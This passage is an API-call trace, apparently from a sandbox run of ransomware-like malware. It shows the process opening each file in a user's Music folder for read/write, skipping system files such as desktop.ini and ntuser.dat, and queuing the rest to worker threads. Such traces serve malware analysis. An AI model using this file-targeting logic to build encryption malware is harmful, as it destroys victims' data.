(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2 8QDmBQXX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2 8qdmbqxx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x840 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="read_me.txt") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="desktop.ini") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="autorun.inf") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="iconcache.db") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="boot.ini") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.090] StrStrW (lpFirst="2 8qdmbqxx.m4a", lpSrch="thumbs.db") returned 0x0 [0079.090] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 120 [0079.090] QueueUserWorkItem (Function=0x404e00, Context=0x840, Flags=0x0) returned 1 [0079.090] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4237ee10, ftCreationTime.dwHighDateTime=0x1d4cc62, ftLastAccessTime.dwLowDateTime=0x1d651530, ftLastAccessTime.dwHighDateTime=0x1d4d3a7, ftLastWriteTime.dwLowDateTime=0x1d651530, ftLastWriteTime.dwHighDateTime=0x1d4d3a7, nFileSizeHigh=0x0, nFileSizeLow=0x1618b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="47X44 RuUn2p-zADr2S.wav", cAlternateFileName="47X44R~1.WAV")) returned 1 [0079.090] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\47X44 RuUn2p-zADr2S.wav") returned 63 [0079.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\47X44 RuUn2p-zADr2S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\47x44 ruun2p-zadr2s.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x83c [0079.090] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="read_me.txt") returned 0x0 [0079.090] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="autoexec.bat") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="desktop.ini") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="autorun.inf") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="ntuser.dat") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="iconcache.db") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="bootsect.bak") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="boot.ini") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.091] StrStrW (lpFirst="47x44 ruun2p-zadr2s.wav", lpSrch="thumbs.db") returned 0x0 [0079.091] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 121 [0079.091] QueueUserWorkItem (Function=0x404e00, Context=0x83c, Flags=0x0) returned 1 [0079.091] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf9d070, ftCreationTime.dwHighDateTime=0x1d4c6fa, ftLastAccessTime.dwLowDateTime=0xf30e7f60, ftLastAccessTime.dwHighDateTime=0x1d4c866, ftLastWriteTime.dwLowDateTime=0xf30e7f60, ftLastWriteTime.dwHighDateTime=0x1d4c866, nFileSizeHigh=0x0, nFileSizeLow=0x18f03, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="4IJYGyF2WXYRqaNuFGJ.wav", cAlternateFileName="4IJYGY~1.WAV")) returned 1 [0079.091] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4IJYGyF2WXYRqaNuFGJ.wav") returned 63 [0079.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4IJYGyF2WXYRqaNuFGJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ijygyf2wxyrqanufgj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x828 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="read_me.txt") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="autoexec.bat") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="desktop.ini") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="autorun.inf") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="ntuser.dat") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="iconcache.db") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="bootsect.bak") returned 0x0 [0079.091] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="boot.ini") returned 0x0 [0079.092] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.092] StrStrW (lpFirst="4ijygyf2wxyrqanufgj.wav", lpSrch="thumbs.db") returned 0x0 [0079.092] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 122 [0079.092] QueueUserWorkItem (Function=0x404e00, Context=0x828, Flags=0x0) returned 1 [0079.092] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba15ef0, ftCreationTime.dwHighDateTime=0x1d4d1ee, ftLastAccessTime.dwLowDateTime=0xa403aa0, ftLastAccessTime.dwHighDateTime=0x1d4c7b0, ftLastWriteTime.dwLowDateTime=0xa403aa0, ftLastWriteTime.dwHighDateTime=0x1d4c7b0, nFileSizeHigh=0x0, nFileSizeLow=0x708f, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="4Jt_31wYtUIO8SuHsWlx.mp3", cAlternateFileName="4JT_31~1.MP3")) returned 1 [0079.092] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4Jt_31wYtUIO8SuHsWlx.mp3") returned 64 [0079.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4Jt_31wYtUIO8SuHsWlx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4jt_31wytuio8suhswlx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x838 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="read_me.txt") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="desktop.ini") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="autorun.inf") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="iconcache.db") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="boot.ini") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.092] StrStrW (lpFirst="4jt_31wytuio8suhswlx.mp3", lpSrch="thumbs.db") returned 0x0 [0079.092] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 123 [0079.092] QueueUserWorkItem (Function=0x404e00, Context=0x838, Flags=0x0) returned 1 [0079.093] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84eeeea0, ftCreationTime.dwHighDateTime=0x1d4ca07, ftLastAccessTime.dwLowDateTime=0xcc678e50, ftLastAccessTime.dwHighDateTime=0x1d4cfa1, ftLastWriteTime.dwLowDateTime=0xcc678e50, ftLastWriteTime.dwHighDateTime=0x1d4cfa1, nFileSizeHigh=0x0, nFileSizeLow=0x18e3e, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="4QHkCveu7OglYv0ttv.mp3", cAlternateFileName="4QHKCV~1.MP3")) returned 1 [0079.093] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QHkCveu7OglYv0ttv.mp3") returned 62 [0079.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QHkCveu7OglYv0ttv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4qhkcveu7oglyv0ttv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x834 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="read_me.txt") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="desktop.ini") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="autorun.inf") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="iconcache.db") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="boot.ini") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.093] StrStrW (lpFirst="4qhkcveu7oglyv0ttv.mp3", lpSrch="thumbs.db") returned 0x0 [0079.093] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 124 [0079.093] QueueUserWorkItem (Function=0x404e00, Context=0x834, Flags=0x0) returned 1 [0079.093] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde98fa50, ftCreationTime.dwHighDateTime=0x1d4ce75, ftLastAccessTime.dwLowDateTime=0xf652dda0, ftLastAccessTime.dwHighDateTime=0x1d4d59b, ftLastWriteTime.dwLowDateTime=0xf652dda0, ftLastWriteTime.dwHighDateTime=0x1d4d59b, nFileSizeHigh=0x0, nFileSizeLow=0x77ac, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="aGj9lhKJ E_hyqy.mp3", cAlternateFileName="AGJ9LH~1.MP3")) returned 1 [0079.093] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aGj9lhKJ E_hyqy.mp3") returned 59 [0079.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aGj9lhKJ E_hyqy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\agj9lhkj e_hyqy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x830 [0079.093] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="read_me.txt") returned 0x0 [0079.093] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="desktop.ini") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="autorun.inf") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="iconcache.db") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="boot.ini") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.094] StrStrW (lpFirst="agj9lhkj e_hyqy.mp3", lpSrch="thumbs.db") returned 0x0 [0079.094] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 125 [0079.094] QueueUserWorkItem (Function=0x404e00, Context=0x830, Flags=0x0) returned 1 [0079.094] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0079.094] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0079.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x824 [0079.094] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0079.094] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0079.094] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0079.094] CloseHandle (hObject=0x824) returned 1 [0079.094] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfba2530, ftCreationTime.dwHighDateTime=0x1d4d4df, ftLastAccessTime.dwLowDateTime=0xd384fa00, ftLastAccessTime.dwHighDateTime=0x1d4d1ff, ftLastWriteTime.dwLowDateTime=0xd384fa00, ftLastWriteTime.dwHighDateTime=0x1d4d1ff, nFileSizeHigh=0x0, nFileSizeLow=0x16883, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="dT_vh79Fhgm1.m4a", cAlternateFileName="DT_VH7~1.M4A")) returned 1 [0079.094] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dT_vh79Fhgm1.m4a") returned 56 [0079.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dT_vh79Fhgm1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dt_vh79fhgm1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x824 [0079.094] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="read_me.txt") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="desktop.ini") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="autorun.inf") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="iconcache.db") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="boot.ini") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.095] StrStrW (lpFirst="dt_vh79fhgm1.m4a", lpSrch="thumbs.db") returned 0x0 [0079.095] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 126 [0079.095] QueueUserWorkItem (Function=0x404e00, Context=0x824, Flags=0x0) returned 1 [0079.095] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48d30690, ftCreationTime.dwHighDateTime=0x1d4c7be, ftLastAccessTime.dwLowDateTime=0xde3e3a60, ftLastAccessTime.dwHighDateTime=0x1d4c615, ftLastWriteTime.dwLowDateTime=0xde3e3a60, ftLastWriteTime.dwHighDateTime=0x1d4c615, nFileSizeHigh=0x0, nFileSizeLow=0x111a3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="efs-a0OWl9ErD_hWJe.mp3", cAlternateFileName="EFS-A0~1.MP3")) returned 1 [0079.095] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efs-a0OWl9ErD_hWJe.mp3") returned 62 [0079.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efs-a0OWl9ErD_hWJe.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\efs-a0owl9erd_hwje.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x810 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="read_me.txt") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="desktop.ini") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="autorun.inf") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="iconcache.db") returned 0x0 [0079.095] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.096] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="boot.ini") returned 0x0 [0079.096] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.096] StrStrW (lpFirst="efs-a0owl9erd_hwje.mp3", lpSrch="thumbs.db") returned 0x0 [0079.096] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 127 [0079.096] QueueUserWorkItem (Function=0x404e00, Context=0x810, Flags=0x0) returned 1 [0079.096] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd03a3d0, ftCreationTime.dwHighDateTime=0x1d4ce40, ftLastAccessTime.dwLowDateTime=0xcfc1b3f0, ftLastAccessTime.dwHighDateTime=0x1d4d311, ftLastWriteTime.dwLowDateTime=0xcfc1b3f0, ftLastWriteTime.dwHighDateTime=0x1d4d311, nFileSizeHigh=0x0, nFileSizeLow=0x11ffb, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="El0XAVmXeAFu5IQuC8A.mp3", cAlternateFileName="EL0XAV~1.MP3")) returned 1 [0079.096] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\El0XAVmXeAFu5IQuC8A.mp3") returned 63 [0079.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\El0XAVmXeAFu5IQuC8A.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\el0xavmxeafu5iquc8a.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x804 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="read_me.txt") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="desktop.ini") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="autorun.inf") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="iconcache.db") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="boot.ini") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.096] StrStrW (lpFirst="el0xavmxeafu5iquc8a.mp3", lpSrch="thumbs.db") returned 0x0 [0079.096] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 128 [0079.096] QueueUserWorkItem (Function=0x404e00, Context=0x804, Flags=0x0) returned 1 [0079.096] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1e00, ftCreationTime.dwHighDateTime=0x1d4cf6b, ftLastAccessTime.dwLowDateTime=0x30dcd1d0, ftLastAccessTime.dwHighDateTime=0x1d4c55f, ftLastWriteTime.dwLowDateTime=0x30dcd1d0, ftLastWriteTime.dwHighDateTime=0x1d4c55f, nFileSizeHigh=0x0, nFileSizeLow=0xd01, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="em6U_Ohj.m4a", cAlternateFileName="")) returned 1 [0079.096] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\em6U_Ohj.m4a") returned 52 [0079.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\em6U_Ohj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\em6u_ohj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e8 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="read_me.txt") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="desktop.ini") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="autorun.inf") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="iconcache.db") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="boot.ini") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.097] StrStrW (lpFirst="em6u_ohj.m4a", lpSrch="thumbs.db") returned 0x0 [0079.097] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 129 [0079.097] QueueUserWorkItem (Function=0x404e00, Context=0x7e8, Flags=0x0) returned 1 [0079.097] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41c07e60, ftCreationTime.dwHighDateTime=0x1d4cb55, ftLastAccessTime.dwLowDateTime=0x50b1a40, ftLastAccessTime.dwHighDateTime=0x1d4d003, ftLastWriteTime.dwLowDateTime=0x50b1a40, ftLastWriteTime.dwHighDateTime=0x1d4d003, nFileSizeHigh=0x0, nFileSizeLow=0x3fb1, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="GEAX6ztsqKfms.mp3", cAlternateFileName="GEAX6Z~1.MP3")) returned 1 [0079.097] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GEAX6ztsqKfms.mp3") returned 57 [0079.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GEAX6ztsqKfms.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\geax6ztsqkfms.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ec [0079.097] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="read_me.txt") returned 0x0 [0079.097] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.097] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="desktop.ini") returned 0x0 [0079.097] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="autorun.inf") returned 0x0 [0079.098] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.098] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="iconcache.db") returned 0x0 [0079.098] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.098] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="boot.ini") returned 0x0 [0079.098] StrStrW 